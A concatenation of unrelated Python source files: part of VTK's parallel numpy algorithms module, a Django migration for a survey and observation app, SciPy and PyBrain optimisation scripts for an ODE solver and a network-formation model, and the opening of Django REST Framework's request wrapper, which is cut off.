components of each tuple and return an m-tuple, 1-component array. When called in parallel, this function will compute the variance across processes when a controller argument is passed or the global controller is defined. To disable parallel summing when running in parallel, pass a dummy controller as follows: var(array, controller=vtk.vtkDummyController()). """ if axis is None or axis == 0: size = _array_count(array, axis, controller) tmp = array - mean(array, axis, controller, size) return sum(tmp*tmp, axis, controller) / size else: if type(array) == dsa.VTKCompositeDataArray: return apply_ufunc(algs.var, array, (axis,)) else: return algs.var(array, axis) def std(array, axis=None, controller=None): """Returns the standard deviation of all values along a particular axis (dimension). Given an array of m tuples and n components: * Default is to return the standard deviation of all values in an array. * axis=0: Return the standard deviation values of all components and return a one tuple, n-component array. * axis=1: Return the standard deviation values of all components of each tuple and return an m-tuple, 1-component array. When called in parallel, this function will compute the standard deviation across processes when a controller argument is passed or the global controller is defined. To disable parallel summing when running in parallel, pass a dummy controller as follows: std(array, controller=vtk.vtkDummyController()). """ return sqrt(var(array, axis, controller)) def shape(array): "Returns the shape (dimensions) of an array." if type(array) == dsa.VTKCompositeDataArray: shp = None for a in array.Arrays: if a is not dsa.NoneArray: if shp is None: shp = list(a.shape) else: tmp = a.shape if (len(shp) != len(tmp)): raise ValueError("Expected arrays of same shape") shp[0] += tmp[0] for idx in range(1,len(tmp)): if shp[idx] != tmp[idx]: raise ValueError("Expected arrays of same shape") return tuple(shp) elif array is dsa.NoneArray: return () else: return numpy.shape(array) def make_vector(arrayx, arrayy, arrayz=None): """Given 2 or 3 scalar arrays, returns a vector array. If only 2 scalars are provided, the third component will be set to 0.""" if type(arrayx) == dsa.VTKCompositeDataArray and type(arrayy) == dsa.VTKCompositeDataArray and (type(arrayz) == dsa.VTKCompositeDataArray or arrayz is None): res = [] if arrayz is None: for ax, ay in izip(arrayx.Arrays, arrayy.Arrays): if ax is not dsa.NoneArray and ay is not dsa.NoneArray: res.append(algs.make_vector(ax, ay)) else: res.append(dsa.NoneArray) else: for ax, ay, az in izip(arrayx.Arrays, arrayy.Arrays, arrayz.Arrays): if ax is not dsa.NoneArray and ay is not dsa.NoneArray and az is not dsa.NoneArray: res.append(algs.make_vector(ax, ay, az)) else: res.append(dsa.NoneArray) return dsa.VTKCompositeDataArray(res, dataset = arrayx.DataSet) else: return algs.make_vector(arrayx, arrayy, arrayz) def unstructured_from_composite_arrays(points, arrays, controller=None): """Given a set of VTKCompositeDataArrays, creates a vtkUnstructuredGrid. The main goal of this function is to transform the output of XXX_per_block() methods to a single dataset that can be visualized and further processed. Here arrays is an iterable (e.g. list) of (array, name) pairs. Here is an example: centroid = mean_per_block(composite_data.Points) T = mean_per_block(composite_data.PointData['Temperature']) ug = unstructured_from_composite_arrays(centroid, (T, 'Temperature')) When called in parallel, this function makes sure that each array in the input dataset is represented only on 1 process. This is important because methods like mean_per_block() return the same value for blocks that are partitioned on all of the participating processes. If the same point were to be created across multiple processes in the output, filters like histogram would report duplicate values erroneously. """ try: dataset = points.DataSet except AttributeError: dataset = None if dataset is None and points is not dsa.NoneArray: raise ValueError("Expecting a points arrays with an associated dataset.") if points is dsa.NoneArray: cpts = [] else: cpts = points.Arrays ownership = numpy.zeros(len(cpts), dtype=numpy.int32) rank = 0 # Let's first create a map of array index to composite ids. if dataset is None: ids = [] else: it = dataset.NewIterator() it.UnRegister(None) itr = cpts.__iter__() ids = numpy.empty(len(cpts), dtype=numpy.int32) counter = 0 while not it.IsDoneWithTraversal(): _id = it.GetCurrentFlatIndex() ids[counter] = _id counter += 1 it.GoToNextItem() if controller is None and vtkMultiProcessController is not None: controller = vtkMultiProcessController.GetGlobalController() if controller and controller.IsA("vtkMPIController"): from mpi4py import MPI comm = vtkMPI4PyCommunicator.ConvertToPython(controller.GetCommunicator()) rank = comm.Get_rank() # Determine the max id to use for reduction # operations # Get all ids from dataset, including empty ones. lmax_id = numpy.int32(0) if dataset is not None: it = dataset.NewIterator() it.UnRegister(None) it.SetSkipEmptyNodes(False) while not it.IsDoneWithTraversal(): _id = it.GetCurrentFlatIndex() lmax_id = numpy.max((lmax_id, _id)).astype(numpy.int32) it.GoToNextItem() max_id = numpy.array(0, dtype=numpy.int32) mpitype = _lookup_mpi_type(numpy.int32) comm.Allreduce([lmax_id, mpitype], [max_id, mpitype], MPI.MAX) # Now we figure out which processes have which ids lownership = numpy.empty(max_id, dtype = numpy.int32) lownership.fill(numpy.iinfo(numpy.int32).max) ownership = numpy.empty(max_id, dtype = numpy.int32) if dataset is not None: it = dataset.NewIterator() it.UnRegister(None) it.InitTraversal() itr = cpts.__iter__() while not it.IsDoneWithTraversal(): _id = it.GetCurrentFlatIndex() if itr.next() is not dsa.NoneArray: lownership[_id] = rank it.GoToNextItem() mpitype = _lookup_mpi_type(numpy.int32) # The process with the lowest id containing a block will # produce the output for that block. comm.Allreduce([lownership, mpitype], [ownership, mpitype], MPI.MIN) # Iterate over blocks to produce points and arrays from vtk.vtkCommonDataModel import vtkUnstructuredGrid from vtk.vtkCommonCore import vtkDoubleArray, vtkPoints ugrid = vtkUnstructuredGrid() da = vtkDoubleArray() da.SetNumberOfComponents(3) pts = vtkPoints() pts.SetData(da) counter = 0 for pt in cpts: if ownership[ids[counter]] == rank: pts.InsertNextPoint(tuple(pt)) counter += 1 ugrid.SetPoints(pts) for ca, name in arrays: if ca is not dsa.NoneArray: da = vtkDoubleArray() ncomps = ca.Arrays[0].flatten().shape[0] da.SetNumberOfComponents(ncomps) counter = 0 for a in ca.Arrays: if ownership[ids[counter]] == rank: a = a.flatten() for i in range(ncomps): da.InsertNextValue(a[i]) counter += 1 if len(a) > 0: da.SetName(name) ugrid.GetPointData().AddArray(da) return ugrid sqrt = _make_ufunc(numpy.sqrt) sqrt.__doc__ = "Computes square root." negative = _make_ufunc(numpy.negative) negative.__doc__ = "Numerical negative, element-wise." reciprocal = _make_ufunc(numpy.reciprocal) reciprocal.__doc__ = "Return the reciprocal (1/x) of the argument, element-wise." square = _make_ufunc(numpy.square) square.__doc__ = "Return the element-wise square of the input." exp = _make_ufunc(numpy.exp) exp.__doc__ = "The exponential function." floor = _make_ufunc(numpy.floor) floor.__doc__ = "Returns the floor of floating point values." ceil = _make_ufunc(numpy.ceil) ceil.__doc__ = "Returns the ceiling of floating point values." rint = _make_ufunc(numpy.rint) rint.__doc__ = "Round elements of the array to the nearest integer." sin = _make_ufunc(numpy.sin) sin.__doc__ = "Computes sine of values in radians." cos = _make_ufunc(numpy.cos) cos.__doc__ = "Computes cosine of values in radians." tan = _make_ufunc(numpy.tan) tan.__doc__ = "Computes tangent of values in radians." arcsin = _make_ufunc(numpy.arcsin) arcsin.__doc__ = "Computes inverse sine." arccos = _make_ufunc(numpy.arccos) arccos.__doc__ = "Computes inverse cosine." arctan = _make_ufunc(numpy.arctan) arctan.__doc__ = "Computes inverse tangent." arctan2 = _make_dfunc(numpy.arctan2) arctan2.__doc__ = "Computes inverse tangent using two arguments." sinh = _make_ufunc(numpy.sinh) sinh.__doc__ = "Computes hyperbolic sine." cosh = _make_ufunc(numpy.cosh) cosh.__doc__ = "Computes hyperbolic cosine." tanh = _make_ufunc(numpy.tanh) tanh.__doc__ = "Computes hyperbolic tangent." arcsinh = _make_ufunc(numpy.arcsinh) arcsinh.__doc__ = "Computes inverse hyperbolic sine." arccosh = _make_ufunc(numpy.arccosh) arccosh.__doc__ = "Computes inverse hyperbolic cosine." arctanh = _make_ufunc(numpy.arctanh) arctanh.__doc__ = "Computes inverse hyperbolic tangent." where = _make_ufunc(numpy.where) where.__doc__ = """Returns the location (indices) of an array where the given expression is true. For scalars, it returns a single array of indices. For vectors and matrices, it returns two arrays: first with tuple indices, second with component indices. The output of this method can be used to extract the values from the array also by using it as the index of the [] operator. For example: >>> algs.where(algs.array([1,2,3]) == 2) (array([1]),) >>> algs.where(algs.array([[1,2,3], [2,1,1]]) == 2) (array([0, 1]), array([1, 0])) >>> a = array([[1,2,3], [2,1,1]]) >>> indices = algs.where(a > 2) >>> a[indices] array([3]) """ flatnonzero = _make_ufunc(numpy.flatnonzero) flatnonzero.__doc__ = "Return indices that are non-zero in the flattened version of the input array." nonzero = _make_ufunc(numpy.nonzero) nonzero.__doc__ = "Return the indices of the non-zero elements of the input array." expand_dims = _make_dfunc(numpy.expand_dims) expand_dims.__doc__ = """Insert a new dimension, corresponding to a given position in the array shape. In VTK, this function's main use is to enable an operator to work on a vector and a scalar field. For example, say you want to divide each component of a vector by the magnitude of that vector. You might try this: >>> v VTKArray([[ 1., 1., 1.], [ 1., 1., 1.], [ 1., 1., 1.], [ 1., 1., 1.], [ 1., 1., 1.]]) >>> algs.mag(v) VTKArray([ 1.73205081, 1.73205081, 1.73205081, 1.73205081, 1.73205081]) >>> v / algs.mag(v) Traceback (most recent call last): File "<stdin>", line 1, in <module> ValueError: operands could not be broadcast together with shapes (5,3) (5) The division operator does not know how to map a scalar to a vector due to a mismatch in dimensions. This can be solved by making the scalar a vector of 1 component (increasing its dimension to 2) as follows: >>> v / algs.expand_dims(algs.mag(v), 1) VTKArray([[ 0.57735027, 0.57735027, 0.57735027], [ 0.57735027, 0.57735027, 0.57735027], [ 0.57735027, 0.57735027, 0.57735027], [ 0.57735027, 0.57735027, 0.57735027], [ 0.57735027, 0.57735027, 0.57735027]])""" abs = _make_ufunc(algs.abs) abs.__doc__ = "Returns the absolute values of an array of scalars/vectors/tensors." area = _make_dsfunc2(algs.area) area.__doc__ = "Returns the surface area of each 2D cell in a mesh." aspect = _make_dsfunc2(algs.aspect) aspect.__doc__ = "Returns the aspect ratio of each cell in a mesh. See Verdict documentation for details." aspect_gamma = _make_dsfunc2(algs.aspect_gamma) aspect_gamma.__doc__ = "Returns the aspect gamma of each cell in a mesh. This metric compares root-mean-square edge length to volume. See Verdict documentation for details." condition = _make_dsfunc2(algs.condition) condition.__doc__ = "Returns the condition number of each cell in a mesh. See Verdict documentation for details." cross = _make_dfunc(algs.cross) cross.__doc__ = "Return the cross product of two vectors." curl = _make_dsfunc(algs.curl) curl.__doc__ = "Returns the curl a vector field." divergence = _make_dsfunc(algs.divergence) divergence.__doc__ = "Returns the divergence of a vector field." det = _make_ufunc(algs.det) det.__doc__ = "Returns the determinant of 2D matrices." determinant = _make_ufunc(algs.determinant) determinant.__doc__ = "Returns the determinant of 2D matrices." diagonal = _make_dsfunc2(algs.diagonal) diagonal.__doc__ = "Returns the diagonal length of each cell in a dataset. See Verdict documentation for details" dot = _make_dfunc(algs.dot) dot.__doc__ = "Returns the dot product of two vectors." eigenvalue = _make_ufunc(algs.eigenvalue) eigenvalue.__doc__ = "Returns the eigenvalues of 3x3 matrices. Currently only works with symmetric matrices." eigenvector = _make_ufunc(algs.eigenvector) eigenvector.__doc__ = "Returns the eigenvectors of 3x3 matrices. Currently only works with symmetric matrices." gradient = _make_dsfunc(algs.gradient) gradient.__doc__ = "Returns the gradient of scalars or vectors." inv = _make_ufunc(algs.inv) inv.__doc__ = "Returns the inverse of 3x3 matrices." inverse = _make_ufunc(algs.inverse) inverse.__doc__ = "Returns the inverse of 3x3 matrices." jacobian = _make_dsfunc2(algs.jacobian) jacobian.__doc__ = "Returns the Jacobian of a dataset." laplacian = _make_dsfunc(algs.laplacian) laplacian.__doc__ = "Returns the Laplacian of a scalar field." ln = _make_ufunc(algs.ln) ln.__doc__ = "Returns the natural logarithm of its input." log = _make_ufunc(algs.log) log.__doc__ = "Returns the natural logarithm of its input." log10 = _make_ufunc(algs.log10) log10.__doc__ = "Returns the base 10 logarithm of its input." max_angle = _make_dsfunc2(algs.max_angle) max_angle.__doc__ = "Returns the maximum angle of each cell in a dataset. See Verdict documentation for details" mag = _make_ufunc(algs.mag) mag.__doc__ = "Returns the magnitude of vectors." min_angle = _make_dsfunc2(algs.min_angle) min_angle.__doc__ = "Returns the minimum angle of each cell in a dataset." norm = _make_ufunc(algs.norm) norm.__doc__ = "Computes the normalized values of vectors." shear = _make_dsfunc2(algs.shear) shear.__doc__ = "Returns the shear of each cell in a dataset. See Verdict documentation for details." skew = _make_dsfunc2(algs.skew) skew.__doc__ = "Returns the skew of each cell in a dataset. See Verdict documentation for details." strain = _make_dsfunc(algs.strain) strain.__doc__ = "Given a deformation vector, this function computes the infinitesimal (Cauchy) strain tensor. It can also be used to compute strain rate if the input is velocity." surface_normal = _make_dsfunc2(algs.surface_normal) surface_normal.__doc__ = "Returns the surface normal of each cell in a dataset." trace = _make_ufunc(algs.trace) trace.__doc__ = "Returns the trace of square matrices." volume = _make_dsfunc2(algs.volume) volume.__doc__ = "Returns the volume of each cell in a dataset. Use sum to calculate total volume of a dataset." vorticity = _make_dsfunc(algs.vorticity) vorticity.__doc__ = "Given a velocity field, calculates vorticity." vertex_normal = _make_dsfunc2(algs.vertex_normal) vertex_normal.__doc__ = "Returns the normal at each vertex of a dataset, which is defined as the average of the cell normals of all cells containing that vertex." logical_not = _make_ufunc(numpy.logical_not) logical_not.__doc__ = "Computes the truth value of NOT x element-wise." divide = _make_dfunc(numpy.divide) divide.__doc__ = "Element by element division. Both elements can be single values or arrays. Same as /." multiply = _make_dfunc(numpy.multiply) multiply.__doc__ = "Element by element multiplication. Both elements can be single values or arrays. Same as *." add = _make_dfunc(numpy.add) add.__doc__ = "Element by element addition. Both elements can be single values or arrays. Same as +." subtract = _make_dfunc(numpy.subtract) subtract.__doc__ = "Returns the difference of two values element-wise. Same as x - y." mod = _make_dfunc(numpy.mod) mod.__doc__ = "Computes x1 - floor(x1 / x2) * x2, the result has the same sign as the divisor x2. It is equivalent to the Python modulus operator x1 % x2. Same as remainder." remainder = _make_dfunc(numpy.remainder) remainder.__doc__ = "Computes x1 - floor(x1 / x2) * x2, the result has the same sign as the divisor x2. It is equivalent to the Python modulus operator x1 % x2. Same as mod." power = _make_dfunc(numpy.power) power.__doc__ = "First array elements raised to powers from second array, element-wise." hypot = _make_dfunc(numpy.hypot) hypot.__doc__ = "Given the 'legs' of a right triangle, return its hypotenuse."
# -*- coding: utf-8 -*- # Generated by Django 1.11.2 on 2017-08-23 17:13 from __future__ import unicode_literals import ckeditor.fields import django.contrib.gis.db.models.fields from django.db import migrations, models import django.db.models.deletion import django.utils.timezone class Migration(migrations.Migration): replaces = [('hnfp', '0001_initial'), ('hnfp', '0002_auto_20170710_1438'), ('hnfp', '0003_post'), ('hnfp', '0004_aoi_jobopportunity'), ('hnfp', '0005_auto_20170728_1518'), ('hnfp', '0006_auto_20170728_1536'), ('hnfp', '0007_auto_20170808_1556'), ('hnfp', '0008_auto_20170808_1558'), ('hnfp', '0009_auto_20170809_1521'), ('hnfp', '0010_auto_20170809_1626'), ('hnfp', '0011_auto_20170809_1635'), ('hnfp', '0012_auto_20170810_1103'), ('hnfp', '0015_auto_20170816_1303'), ('hnfp', '0016_auto_20170816_1332'), ('hnfp', '0017_auto_20170816_1509'), ('hnfp', '0018_auto_20170816_1528'), ('hnfp', '0019_auto_20170819_1718'), ('hnfp', '0020_auto_20170820_1602'), ('hnfp', '0021_auto_20170822_1249'), ('hnfp', '0022_auto_20170822_1313'), ('hnfp', '0025_auto_20170822_1446'), ('hnfp', '0026_auto_20170822_1712')] initial = True dependencies = [ ('drawing', '0003_auto_20170706_1438'), ] operations = [ migrations.CreateModel( name='AnswerBase', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('created', models.DateTimeField(auto_now_add=True)), ('updated', models.DateTimeField(auto_now=True)), ], ), migrations.CreateModel( name='Category', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=400)), ], ), migrations.CreateModel( name='Question', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('text', models.TextField()), ('required', models.BooleanField()), ('question_type', models.CharField(choices=[('text', 'text'), ('radio', 'radio'), ('select', 'select'), ('select-multiple', 'Select Multiple'), ('integer', 'integer')], default='text', max_length=200)), ('choices', models.TextField(blank=True, help_text='if the question type is "radio," "select," or "select multiple" provide a comma-separated list of options for this question .', null=True)), ('category', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='hnfp.Category')), ], ), migrations.CreateModel( name='Response', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('created', models.DateTimeField(auto_now_add=True)), ('updated', models.DateTimeField(auto_now=True)), ('interviewer', models.CharField(max_length=400, verbose_name='Name of Interviewer')), ('interviewee', models.CharField(max_length=400, verbose_name='Name of Interviewee')), ('conditions', models.TextField(blank=True, null=True, verbose_name='Conditions during interview')), ('comments', models.TextField(blank=True, null=True, verbose_name='Any additional Comments')), ('interview_uuid', models.CharField(max_length=36, verbose_name='Interview unique identifier')), ], ), migrations.CreateModel( name='Survey', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=400)), ('description', models.TextField()), ], ), migrations.CreateModel( name='AnswerInteger', fields=[ ('answerbase_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='hnfp.AnswerBase')), ('body', models.IntegerField(blank=True, null=True)), ], bases=('hnfp.answerbase',), ), migrations.CreateModel( name='AnswerRadio', fields=[ ('answerbase_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='hnfp.AnswerBase')), ('body', models.TextField(blank=True, null=True)), ], bases=('hnfp.answerbase',), ), migrations.CreateModel( name='AnswerSelect', fields=[ ('answerbase_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='hnfp.AnswerBase')), ('body', models.TextField(blank=True, null=True)), ], bases=('hnfp.answerbase',), ), migrations.CreateModel( name='AnswerSelectMultiple', fields=[ ('answerbase_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='hnfp.AnswerBase')), ('body', models.TextField(blank=True, null=True)), ], bases=('hnfp.answerbase',), ), migrations.CreateModel( name='AnswerText', fields=[ ('answerbase_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='hnfp.AnswerBase')), ('body', models.TextField(blank=True, null=True)), ], bases=('hnfp.answerbase',), ), migrations.AddField( model_name='response', name='survey', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='hnfp.Survey'), ), migrations.AddField( model_name='question', name='survey', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='hnfp.Survey'), ), migrations.AddField( model_name='category', name='survey', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='hnfp.Survey'), ), migrations.AddField( model_name='answerbase', name='question', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='hnfp.Question'), ), migrations.AddField( model_name='answerbase', name='response', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='hnfp.Response'), ), migrations.CreateModel( name='Post', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=250)), ('slug', models.SlugField(max_length=250, unique_for_date='publish')), ('body', models.TextField()), ('allow_comments', models.BooleanField(default=True, verbose_name='allow comments')), ('publish', models.DateTimeField(default=django.utils.timezone.now)), ], options={ 'ordering': ('-publish',), }, ), migrations.CreateModel( name='JobOpportunity', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=400)), ('posted', models.DateTimeField(auto_now_add=True)), ('description', ckeditor.fields.RichTextField(blank=True, null=True)), ('jop_post_doc', models.FileField(blank=True, upload_to='job-post/')), ('html_content', models.TextField(blank=True, help_text='html if use html == True', null=True)), ('is_html', models.BooleanField(default=False, help_text='Use HTML editor')), ], options={ 'verbose_name_plural': 'Job Opportunities', }, ), migrations.CreateModel( name='Observation', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('customcategory', models.CharField(blank=True, max_length=400, null=True)), ('observation_date', models.CharField(blank=True, max_length=100, null=True)), ('observation_type', models.CharField(blank=True, max_length=400, null=True)), ('observation_tally', models.CharField(blank=True, default=1, max_length=100, null=True)), ('observation_created', models.DateTimeField(auto_now_add=True)), ('observation_updated', models.DateTimeField(auto_now=True)), ('number_of_observers', models.CharField(blank=True, default=1, max_length=100, null=True)), ('comments', models.CharField(blank=True, default=None, max_length=20000, null=True)), ('category', models.CharField(choices=[('bear', 'Bear'), ('deer', 'Dear'), ('medicinal_herbs', 'Medicinal Herbs'), ('shrimp', 'Shrimp'), ('berries', 'Berries'), ('firewood', 'Firewood'), ('mushrooms', 'Mushrooms'), ('crab', 'Crab'), ('fish', 'Fish'), ('shellfish', 'Shellfish'), ('custom', 'Custom')], default='custom', max_length=400)), ('observation_time', models.CharField(blank=True, max_length=20, null=True)), ('observation_location', django.contrib.gis.db.models.fields.PointField(blank=True, default=None, null=True, srid=3857)), ], options={ 'verbose_name_plural': 'Observations', }, ), migrations.CreateModel( name='AOI', fields=[ ('aoi_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='drawing.AOI')), ], options={ 'abstract': False, }, bases=('drawing.aoi',), ), ]
from scipy.special import expit import scipy.optimize from scipy.optimize import minimize #, differential_evolution import numpy as np from math import sin,cos #xarr=var('xarr') x=np.linspace(0,2,11) #x=np.array([1.0]) hvar=5 numeqs=4 omega=1.0 theta=1.0 bounds=np.zeros([3*4*5,2]) for i in range(3*4*5): bounds[i,0]=-5 bounds[i,1]=5 partot=np.array(np.zeros(3*hvar*numeqs)) x0=[1.0,0.0,0.0,0.0] #par = par.reshape(3,hvar) print partot print x one=np.ones(hvar) def sig(x,par): ans=[] par1 = par.reshape(3,hvar) #print "test", par[2] for i in x: ans.append(expit(i*par1[1,:]+par1[2,:])) #ans.append(np.tanh(i*par1[1,:]+par1[2,:])) return ans def N(x,par): par1=par.reshape(3,hvar) ans=np.inner(par1[0,:],sig(x,par)) return ans def y(x,par,xini): return xini+x*N(x,par) def dNdx(x,par): par1=par.reshape(3,hvar) ans=np.zeros(len(x)) #print len(x) for j in range(len(x)): for i in range(hvar): ans[j]=ans[j]+(par1[0,i])*(sig(x,par)[j][i])*((one-sig(x,par))[j][i])*par1[1,i] return(ans) def dydx(x,par): return N(x,par)+x*dNdx(x,par) def yp(partot): partot1=partot.reshape((numeqs,3,hvar)) cost=0.0 cost=cost+np.sum(0.5*(dydx(x,partot1[0,:,:])-2*omega*sin(2*theta)*y(x,partot1[3,:,:],x0[3]))**2) cost=cost+np.sum(0.5*(dydx(x,partot1[1,:,:])+2*omega*sin(2*theta)*y(x,partot1[3,:,:],x0[3]))**2) cost=cost+np.sum(0.5*(dydx(x,partot1[2,:,:])-2*omega*cos(2*theta)*y(x,partot1[3,:,:],x0[3]))**2) cost=cost+np.sum(0.5*(dydx(x,partot1[3,:,:])+2*omega*cos(2*theta)*y(x,partot1[2,:,:],x0[2])+omega*sin(2*theta)*y(x,partot1[0,:,:],x0[0])-omega*sin(2*theta)*y(x,partot1[1,:,:],x0[1]))**2) cost = cost#+np.sum((y(x,partot1[0,:,:],x0[0])+y(x,partot1[1,:,:],x0[1])-1.0)**2) return cost #def ypprime(par): #vout=minimize(yp,par,method='COBYLA',options={"maxfev": 10000}) #vout=minimize(yp,partot,method='SLSQP',options={"maxiter": 1000}) vout=minimize(yp,partot,method='Nelder-Mead',tol=1e-5,options={"ftol":1e-3, "maxfev": 1000000,"maxiter":1000000}) #vout=differential_evolution(yp,bounds,strategy='best1bin',tol=0.1,maxiter=1,polish=True) print vout np.savetxt('vout-output.txt', vout, delimiter=',')
# This file, apart from implementing a network formation model, also demonstrates the use of a Black Box optimization technique # implemented via Pybrain (pybrain.org) #Note that module.py needs to be imported in order to run this from __future__ import division import module import math import networkx as nx from numpy import mean from numpy import std from pybrain.optimization import CMAES import time start_time = time.time() zac = nx.karate_club_graph() #print module.rec_number(zac,0), module.rec_number(zac,1), module.rec_number(zac,2) er = nx.florentine_families_graph() countess = 0 def graph_function(p): if(p[0]<0): p[0] = p[0]*(-1) if(p[1]<0): p[1] = p[1]*(-1) if(p[2]<0): p[2] = p[2]*(-1) q = p[0] + p[1] + p[2] p[3] = p[4] = p[5] = p[6] = 0 p[0] = p[0]/q p[1] = p[1]/q p[2] = p[2]/q nodes = 20 edges = 50 simulations = 10 # tri_count = [module.rec_number(er,0), module.rec_number(er,1), module.rec_number(er,2)] tri_count = [5.6,8.36,13.96] tri_0 = [] tri_1 = [] tri_2 = [] count = 0 while(count<simulations): main = nx.Graph() for i in range(1,nodes+1): main.add_node(i) while(len(main.edges())<edges): string, n = module.place_edge(main, p) if(string == 'stop'): break tri_0.append(module.rec_number(main,0)) tri_1.append(module.rec_number(main,1)) tri_2.append(module.rec_number(main,2)) count = count + 1 print count return pow((mean(tri_0) - tri_count[0]),2) + pow((mean(tri_1) - tri_count[1]),2) + pow((mean(tri_2) - tri_count[2]),2) def objF(p) : return graph_function(p) p0 = [0.333,0.3333,0.3333,0,0,0,0] #p0 = [1/7,1/7,1/7,1/7,1/7,1/7,1/7] l = CMAES(objF, p0) l.verbose = True l.minimize = True l._notify() l.desiredEvaluation = 3 g = l.learn() if(g[0][0]<0): g[0][0] = g[0][0]*(-1) if(g[0][1]<0): g[0][1] = g[0][1]*(-1) if(g[0][2]<0): g[0][2] = g[0][2]*(-1) summ = g[0][0] + g[0][1] + g[0][2] print g[0][0]/summ, g[0][1]/summ, g[0][2]/summ print g[1] end_time = time.time() print "The optimization took ", end_time - start_time, " seconds"
""" The Request class is used as a wrapper around the standard request object. The wrapped request then offers a richer API, in particular : - content automatically parsed according to `Content-Type` header, and available as `request.data` - full support of PUT method, including support for file uploads - form overloading of HTTP method, content type and content """ import io import sys from contextlib import contextmanager from django.conf import settings from django.http import HttpRequest, QueryDict from django.http.multipartparser import parse_header from django.http.request import RawPostDataException from django.utils.datastructures import MultiValueDict from rest_framework import HTTP_HEADER_ENCODING, exceptions from rest_framework.settings import api_settings def is_form_media_type(media_type): """ Return True if the media type is a valid form media type. """ base_media_type, params = parse_header(media_type.encode(HTTP_HEADER_ENCODING)) return (base_media_type == 'application/x-www-form-urlencoded' or base_media_type == 'multipart/form-data') class override_method: """ A context manager that temporarily overrides the method on a request, additionally setting the `view.request` attribute. Usage: with override_method(view, request, 'POST') as request: ... # Do stuff with `view` and `request` """ def __init__(self, view, request, method): self.view = view self.request = request self.method = method self.action = getattr(view, 'action', None) def __enter__(self): self.view.request = clone_request(self.request, self.method) # For viewsets we also set the `.action` attribute. action_map = getattr(self.view, 'action_map', {}) self.view.action = action_map.get(self.method.lower()) return self.view.request def __exit__(self, *args, **kwarg): self.view.request = self.request self.view.action = self.action class WrappedAttributeError(Exception): pass @contextmanager def wrap_attributeerrors(): """ Used to re-raise AttributeErrors caught during authentication, preventing these errors from otherwise being handled by the attribute access protocol. """ try: yield except AttributeError: info = sys.exc_info() exc = WrappedAttributeError(str(info[1])) raise exc.with_traceback(info[2]) class Empty: """ Placeholder for unset attributes. Cannot use `None`, as that may be a valid value. """ pass def _hasattr(obj, name): return not getattr(obj, name) is Empty def clone_request(request, method): """ Internal helper method to clone a request, replacing with a different HTTP method. Used for checking permissions against other methods. """ ret = Request(request=request._request, parsers=request.parsers, authenticators=request.authenticators, negotiator=request.negotiator, parser_context=request.parser_context) ret._data = request._data ret._files = request._files ret._full_data = request._full_data ret._content_type = request._content_type ret._stream = request._stream ret.method = method if hasattr(request, '_user'): ret._user = request._user if hasattr(request, '_auth'): ret._auth = request._auth if hasattr(request, '_authenticator'): ret._authenticator = request._authenticator if hasattr(request, 'accepted_renderer'): ret.accepted_renderer = request.accepted_renderer if hasattr(request, 'accepted_media_type'): ret.accepted_media_type = request.accepted_media_type if hasattr(request, 'version'): ret.version = request.version if hasattr(request, 'versioning_scheme'): ret.versioning_scheme = request.versioning_scheme return ret class ForcedAuthentication: """ This authentication class is used if the test client or request factory forcibly authenticated the request. """ def __init__(self, force_user, force_token): self.force_user = force_user self.force_token = force_token def authenticate(self, request): return (self.force_user, self.force_token) class Request: """ Wrapper allowing to enhance a standard `HttpRequest` instance. Kwargs: - request(HttpRequest). The original request instance. - parsers(list/tuple). The parsers to use for parsing the request content. - authenticators(list/tuple). The authenticators used to try authenticating the request's user. """ def __init__(self, request, parsers=None, authenticators=None, negotiator=None, parser_context=None): assert isinstance(request, HttpRequest), ( 'The `request` argument must be an instance of ' '`django.http.HttpRequest`, not `{}.{}`.' .format(request.__class__.__module__, request.__class__.__name__) ) self._request = request self.parsers = parsers or () self.authenticators = authenticators or () self.negotiator = negotiator or self._default_negotiator() self.parser_context = parser_context self._data = Empty self._files = Empty self._full_data = Empty self._content_type = Empty self._stream = Empty if self.parser_context is None: self.parser_context = {} self.parser_context['request'] = self self.parser_context['encoding'] = request.encoding or settings.DEFAULT_CHARSET force_user = getattr(request, '_force_auth_user', None) force_token = getattr(request, '_force_auth_token', None) if force_user is not None or force_token is not None: forced_auth = ForcedAuthentication(force_user, force_token) self.authenticators = (forced_auth,) def __repr__(self): return '<%s.%s: %s %r>' % ( self.__class__.__module__, self.__class__.__name__, self.method, self.get_full_path()) def _default_negotiator(self): return api_settings.DEFAULT_CONTENT_NEGOTIATION_CLASS() @property def content_type(self): meta = self._request.META return meta.get('CONTENT_TYPE', meta.get('HTTP_CONTENT_TYPE', '')) @property def stream(self): """ Returns an object that may be used to stream the request content. """ if not _hasattr(self, '_stream'): self._load_stream() return self._stream @property def query_params(self): """ More semantically correct name for request.GET. """ return self._request.GET @property def data(self): if not _hasattr(self, '_full_data'): 